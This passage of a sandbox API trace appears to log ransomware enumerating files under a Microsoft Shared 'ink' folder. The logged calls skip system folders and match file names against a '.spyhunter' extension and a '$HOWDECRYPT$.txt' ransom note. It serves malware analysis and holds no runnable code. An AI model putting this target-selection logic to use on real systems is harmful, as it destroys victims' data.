[0086.915] lstrlenW (lpString="System Volume Information") returned 25 [0086.915] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll") returned 73 [0086.915] StrStrIW (lpFirst="IPSEventLogMsg.dll", lpSrch=".spyhunter") returned 0x0 [0086.915] lstrcmpW (lpString1="IPSEventLogMsg.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.915] lstrcmpW (lpString1="IPSEventLogMsg.dll", lpString2="_uninstalling_.png") returned 1 [0086.915] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll") returned 73 [0086.915] GetProcessHeap () returned 0x2c0000 [0086.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x384aa0 [0086.915] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa40) returned 0x3867e8 [0086.915] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.915] lstrcmpiW (lpString1="ipsfin.xml", lpString2="Windows") returned -1 [0086.915] lstrlenW (lpString="Windows") returned 7 [0086.915] lstrcmpiW (lpString1="ipsfin.xml", lpString2="$Recycle.bin") returned 1 [0086.915] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.915] lstrcmpiW (lpString1="ipsfin.xml", lpString2="System Volume Information") returned -1 [0086.915] lstrlenW (lpString="System Volume Information") returned 25 [0086.915] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 65 [0086.916] StrStrIW (lpFirst="ipsfin.xml", lpSrch=".spyhunter") returned 0x0 [0086.916] lstrcmpW (lpString1="ipsfin.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.916] lstrcmpW (lpString1="ipsfin.xml", lpString2="_uninstalling_.png") returned 1 [0086.916] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 65 [0086.916] GetProcessHeap () returned 0x2c0000 [0086.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358880 [0086.916] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa48) returned 0x3867e8 [0086.916] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.916] lstrcmpiW (lpString1="ipsfra.xml", lpString2="Windows") returned -1 [0086.916] lstrlenW (lpString="Windows") returned 7 [0086.916] lstrcmpiW (lpString1="ipsfra.xml", lpString2="$Recycle.bin") returned 1 [0086.916] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.916] lstrcmpiW (lpString1="ipsfra.xml", lpString2="System Volume Information") returned -1 [0086.916] lstrlenW (lpString="System Volume Information") returned 25 [0086.916] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 65 [0086.916] StrStrIW (lpFirst="ipsfra.xml", lpSrch=".spyhunter") returned 0x0 [0086.916] lstrcmpW (lpString1="ipsfra.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.916] lstrcmpW (lpString1="ipsfra.xml", lpString2="_uninstalling_.png") returned 1 [0086.916] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 65 [0086.916] GetProcessHeap () returned 0x2c0000 [0086.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358950 [0086.916] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa50) returned 0x3867e8 [0086.916] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.916] lstrcmpiW (lpString1="ipshrv.xml", lpString2="Windows") returned -1 [0086.916] lstrlenW (lpString="Windows") returned 7 [0086.916] lstrcmpiW (lpString1="ipshrv.xml", lpString2="$Recycle.bin") returned 1 [0086.916] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.916] lstrcmpiW (lpString1="ipshrv.xml", lpString2="System Volume Information") returned -1 [0086.916] lstrlenW (lpString="System Volume Information") returned 25 [0086.917] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 65 [0086.917] StrStrIW (lpFirst="ipshrv.xml", lpSrch=".spyhunter") returned 0x0 [0086.917] lstrcmpW (lpString1="ipshrv.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.917] lstrcmpW (lpString1="ipshrv.xml", lpString2="_uninstalling_.png") returned 1 [0086.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 65 [0086.917] GetProcessHeap () returned 0x2c0000 [0086.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358a20 [0086.917] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa58) returned 0x3867e8 [0086.917] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.917] lstrcmpiW (lpString1="ipsita.xml", lpString2="Windows") returned -1 [0086.917] lstrlenW (lpString="Windows") returned 7 [0086.917] lstrcmpiW (lpString1="ipsita.xml", lpString2="$Recycle.bin") returned 1 [0086.917] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.917] lstrcmpiW (lpString1="ipsita.xml", lpString2="System Volume Information") returned -1 [0086.917] lstrlenW (lpString="System Volume Information") returned 25 [0086.917] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 65 [0086.917] StrStrIW (lpFirst="ipsita.xml", lpSrch=".spyhunter") returned 0x0 [0086.917] lstrcmpW (lpString1="ipsita.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.917] lstrcmpW (lpString1="ipsita.xml", lpString2="_uninstalling_.png") returned 1 [0086.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 65 [0086.917] GetProcessHeap () returned 0x2c0000 [0086.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358af0 [0086.917] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa60) returned 0x3867e8 [0086.917] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.917] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="Windows") returned -1 [0086.917] lstrlenW (lpString="Windows") returned 7 [0086.917] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="$Recycle.bin") returned 1 [0086.917] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.917] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="System Volume Information") returned -1 [0086.917] lstrlenW (lpString="System Volume Information") returned 25 [0086.918] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 65 [0086.918] StrStrIW (lpFirst="ipsjpn.xml", lpSrch=".spyhunter") returned 0x0 [0086.918] lstrcmpW (lpString1="ipsjpn.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.918] lstrcmpW (lpString1="ipsjpn.xml", lpString2="_uninstalling_.png") returned 1 [0086.918] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 65 [0086.918] GetProcessHeap () returned 0x2c0000 [0086.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358bc0 [0086.918] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa68) returned 0x3867e8 [0086.918] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.918] lstrcmpiW (lpString1="ipskor.xml", lpString2="Windows") returned -1 [0086.918] lstrlenW (lpString="Windows") returned 7 [0086.918] lstrcmpiW (lpString1="ipskor.xml", lpString2="$Recycle.bin") returned 1 [0086.918] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.918] lstrcmpiW (lpString1="ipskor.xml", lpString2="System Volume Information") returned -1 [0086.918] lstrlenW (lpString="System Volume Information") returned 25 [0086.918] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 65 [0086.918] StrStrIW (lpFirst="ipskor.xml", lpSrch=".spyhunter") returned 0x0 [0086.918] lstrcmpW (lpString1="ipskor.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.918] lstrcmpW (lpString1="ipskor.xml", lpString2="_uninstalling_.png") returned 1 [0086.918] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 65 [0086.918] GetProcessHeap () returned 0x2c0000 [0086.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358c90 [0086.918] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa70) returned 0x3867e8 [0086.918] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.918] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="Windows") returned -1 [0086.918] lstrlenW (lpString="Windows") returned 7 [0086.918] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="$Recycle.bin") returned 1 [0086.918] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.918] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="System Volume Information") returned -1 [0086.918] lstrlenW (lpString="System Volume Information") returned 25 [0086.919] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll") returned 77 [0086.919] StrStrIW (lpFirst="IpsMigrationPlugin.dll", lpSrch=".spyhunter") returned 0x0 [0086.919] lstrcmpW (lpString1="IpsMigrationPlugin.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.919] lstrcmpW (lpString1="IpsMigrationPlugin.dll", lpString2="_uninstalling_.png") returned 1 [0086.919] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll") returned 77 [0086.919] GetProcessHeap () returned 0x2c0000 [0086.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372ec8 [0086.919] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa78) returned 0x3867e8 [0086.919] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.919] lstrcmpiW (lpString1="ipsnld.xml", lpString2="Windows") returned -1 [0086.919] lstrlenW (lpString="Windows") returned 7 [0086.919] lstrcmpiW (lpString1="ipsnld.xml", lpString2="$Recycle.bin") returned 1 [0086.919] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.919] lstrcmpiW (lpString1="ipsnld.xml", lpString2="System Volume Information") returned -1 [0086.919] lstrlenW (lpString="System Volume Information") returned 25 [0086.919] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 65 [0086.919] StrStrIW (lpFirst="ipsnld.xml", lpSrch=".spyhunter") returned 0x0 [0086.919] lstrcmpW (lpString1="ipsnld.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.919] lstrcmpW (lpString1="ipsnld.xml", lpString2="_uninstalling_.png") returned 1 [0086.920] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 65 [0086.920] GetProcessHeap () returned 0x2c0000 [0086.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358d60 [0086.920] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa80) returned 0x3867e8 [0086.920] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.920] lstrcmpiW (lpString1="ipsnor.xml", lpString2="Windows") returned -1 [0086.920] lstrlenW (lpString="Windows") returned 7 [0086.920] lstrcmpiW (lpString1="ipsnor.xml", lpString2="$Recycle.bin") returned 1 [0086.920] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.920] lstrcmpiW (lpString1="ipsnor.xml", lpString2="System Volume Information") returned -1 [0086.920] lstrlenW (lpString="System Volume Information") returned 25 [0086.920] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 65 [0086.920] StrStrIW (lpFirst="ipsnor.xml", lpSrch=".spyhunter") returned 0x0 [0086.920] lstrcmpW (lpString1="ipsnor.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.920] lstrcmpW (lpString1="ipsnor.xml", lpString2="_uninstalling_.png") returned 1 [0086.920] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 65 [0086.920] GetProcessHeap () returned 0x2c0000 [0086.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358e30 [0086.920] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa88) returned 0x3867e8 [0086.920] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.920] lstrcmpiW (lpString1="ipsplk.xml", lpString2="Windows") returned -1 [0086.920] lstrlenW (lpString="Windows") returned 7 [0086.920] lstrcmpiW (lpString1="ipsplk.xml", lpString2="$Recycle.bin") returned 1 [0086.920] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.920] lstrcmpiW (lpString1="ipsplk.xml", lpString2="System Volume Information") returned -1 [0086.920] lstrlenW (lpString="System Volume Information") returned 25 [0086.920] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 65 [0086.920] StrStrIW (lpFirst="ipsplk.xml", lpSrch=".spyhunter") returned 0x0 [0086.920] lstrcmpW (lpString1="ipsplk.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.921] lstrcmpW (lpString1="ipsplk.xml", lpString2="_uninstalling_.png") returned 1 [0086.921] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 65 [0086.921] GetProcessHeap () returned 0x2c0000 [0086.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358f00 [0086.921] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa90) returned 0x3867e8 [0086.921] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.921] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="Windows") returned -1 [0086.921] lstrlenW (lpString="Windows") returned 7 [0086.921] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="$Recycle.bin") returned 1 [0086.921] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.921] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="System Volume Information") returned -1 [0086.921] lstrlenW (lpString="System Volume Information") returned 25 [0086.921] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 68 [0086.921] StrStrIW (lpFirst="IpsPlugin.dll", lpSrch=".spyhunter") returned 0x0 [0086.921] lstrcmpW (lpString1="IpsPlugin.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.921] lstrcmpW (lpString1="IpsPlugin.dll", lpString2="_uninstalling_.png") returned 1 [0086.921] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 68 [0086.921] GetProcessHeap () returned 0x2c0000 [0086.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x324488 [0086.921] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa98) returned 0x3867e8 [0086.921] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.921] lstrcmpiW (lpString1="ipsptb.xml", lpString2="Windows") returned -1 [0086.921] lstrlenW (lpString="Windows") returned 7 [0086.921] lstrcmpiW (lpString1="ipsptb.xml", lpString2="$Recycle.bin") returned 1 [0086.921] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.921] lstrcmpiW (lpString1="ipsptb.xml", lpString2="System Volume Information") returned -1 [0086.921] lstrlenW (lpString="System Volume Information") returned 25 [0086.921] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 65 [0086.921] StrStrIW (lpFirst="ipsptb.xml", lpSrch=".spyhunter") returned 0x0 [0086.921] lstrcmpW (lpString1="ipsptb.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.921] lstrcmpW (lpString1="ipsptb.xml", lpString2="_uninstalling_.png") returned 1 [0086.922] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 65 [0086.922] GetProcessHeap () returned 0x2c0000 [0086.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358fd0 [0086.922] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaa0) returned 0x3867e8 [0086.922] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.922] lstrcmpiW (lpString1="ipsptg.xml", lpString2="Windows") returned -1 [0086.922] lstrlenW (lpString="Windows") returned 7 [0086.922] lstrcmpiW (lpString1="ipsptg.xml", lpString2="$Recycle.bin") returned 1 [0086.922] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.922] lstrcmpiW (lpString1="ipsptg.xml", lpString2="System Volume Information") returned -1 [0086.922] lstrlenW (lpString="System Volume Information") returned 25 [0086.922] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 65 [0086.922] StrStrIW (lpFirst="ipsptg.xml", lpSrch=".spyhunter") returned 0x0 [0086.922] lstrcmpW (lpString1="ipsptg.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.922] lstrcmpW (lpString1="ipsptg.xml", lpString2="_uninstalling_.png") returned 1 [0086.922] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 65 [0086.922] GetProcessHeap () returned 0x2c0000 [0086.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3590a0 [0086.922] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaa8) returned 0x3867e8 [0086.922] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.922] lstrcmpiW (lpString1="ipsrom.xml", lpString2="Windows") returned -1 [0086.922] lstrlenW (lpString="Windows") returned 7 [0086.922] lstrcmpiW (lpString1="ipsrom.xml", lpString2="$Recycle.bin") returned 1 [0086.922] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.922] lstrcmpiW (lpString1="ipsrom.xml", lpString2="System Volume Information") returned -1 [0086.922] lstrlenW (lpString="System Volume Information") returned 25 [0086.922] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 65 [0086.922] StrStrIW (lpFirst="ipsrom.xml", lpSrch=".spyhunter") returned 0x0 [0086.922] lstrcmpW (lpString1="ipsrom.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.922] lstrcmpW (lpString1="ipsrom.xml", lpString2="_uninstalling_.png") returned 1 [0086.923] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 65 [0086.923] GetProcessHeap () returned 0x2c0000 [0086.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x359170 [0086.923] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xab0) returned 0x3867e8 [0086.923] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.923] lstrcmpiW (lpString1="ipsrus.xml", lpString2="Windows") returned -1 [0086.923] lstrlenW (lpString="Windows") returned 7 [0086.923] lstrcmpiW (lpString1="ipsrus.xml", lpString2="$Recycle.bin") returned 1 [0086.923] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.923] lstrcmpiW (lpString1="ipsrus.xml", lpString2="System Volume Information") returned -1 [0086.923] lstrlenW (lpString="System Volume Information") returned 25 [0086.923] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 65 [0086.923] StrStrIW (lpFirst="ipsrus.xml", lpSrch=".spyhunter") returned 0x0 [0086.923] lstrcmpW (lpString1="ipsrus.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.923] lstrcmpW (lpString1="ipsrus.xml", lpString2="_uninstalling_.png") returned 1 [0086.923] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 65 [0086.923] GetProcessHeap () returned 0x2c0000 [0086.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x359240 [0086.923] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xab8) returned 0x3867e8 [0086.923] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.923] lstrcmpiW (lpString1="ipssrb.xml", lpString2="Windows") returned -1 [0086.923] lstrlenW (lpString="Windows") returned 7 [0086.923] lstrcmpiW (lpString1="ipssrb.xml", lpString2="$Recycle.bin") returned 1 [0086.923] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.923] lstrcmpiW (lpString1="ipssrb.xml", lpString2="System Volume Information") returned -1 [0086.923] lstrlenW (lpString="System Volume Information") returned 25 [0086.923] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 65 [0086.923] StrStrIW (lpFirst="ipssrb.xml", lpSrch=".spyhunter") returned 0x0 [0086.923] lstrcmpW (lpString1="ipssrb.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.923] lstrcmpW (lpString1="ipssrb.xml", lpString2="_uninstalling_.png") returned 1 [0086.924] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 65 [0086.924] GetProcessHeap () returned 0x2c0000 [0086.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x359310 [0086.924] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xac0) returned 0x3867e8 [0086.924] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.924] lstrcmpiW (lpString1="ipssrl.xml", lpString2="Windows") returned -1 [0086.924] lstrlenW (lpString="Windows") returned 7 [0086.924] lstrcmpiW (lpString1="ipssrl.xml", lpString2="$Recycle.bin") returned 1 [0086.924] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.924] lstrcmpiW (lpString1="ipssrl.xml", lpString2="System Volume Information") returned -1 [0086.924] lstrlenW (lpString="System Volume Information") returned 25 [0086.924] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 65 [0086.924] StrStrIW (lpFirst="ipssrl.xml", lpSrch=".spyhunter") returned 0x0 [0086.924] lstrcmpW (lpString1="ipssrl.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.924] lstrcmpW (lpString1="ipssrl.xml", lpString2="_uninstalling_.png") returned 1 [0086.924] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 65 [0086.924] GetProcessHeap () returned 0x2c0000 [0086.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3593e0 [0086.924] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xac8) returned 0x3867e8 [0086.924] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.924] lstrcmpiW (lpString1="ipssve.xml", lpString2="Windows") returned -1 [0086.924] lstrlenW (lpString="Windows") returned 7 [0086.924] lstrcmpiW (lpString1="ipssve.xml", lpString2="$Recycle.bin") returned 1 [0086.924] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.924] lstrcmpiW (lpString1="ipssve.xml", lpString2="System Volume Information") returned -1 [0086.924] lstrlenW (lpString="System Volume Information") returned 25 [0086.924] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 65 [0086.924] StrStrIW (lpFirst="ipssve.xml", lpSrch=".spyhunter") returned 0x0 [0086.924] lstrcmpW (lpString1="ipssve.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.924] lstrcmpW (lpString1="ipssve.xml", lpString2="_uninstalling_.png") returned 1 [0086.924] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 65 [0086.925] GetProcessHeap () returned 0x2c0000 [0086.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3594b0 [0086.925] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xad0) returned 0x3867e8 [0086.925] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.925] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0086.925] lstrlenW (lpString="Windows") returned 7 [0086.925] lstrcmpiW (lpString1="it-IT", lpString2="$Recycle.bin") returned 1 [0086.925] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.925] lstrcmpiW (lpString1="it-IT", lpString2="System Volume Information") returned -1 [0086.925] lstrlenW (lpString="System Volume Information") returned 25 [0086.925] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT") returned 60 [0086.925] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0086.925] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0086.925] GetProcessHeap () returned 0x2c0000 [0086.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.925] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*") returned 62 [0086.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*", lpFindFileData=0x298eca8 | 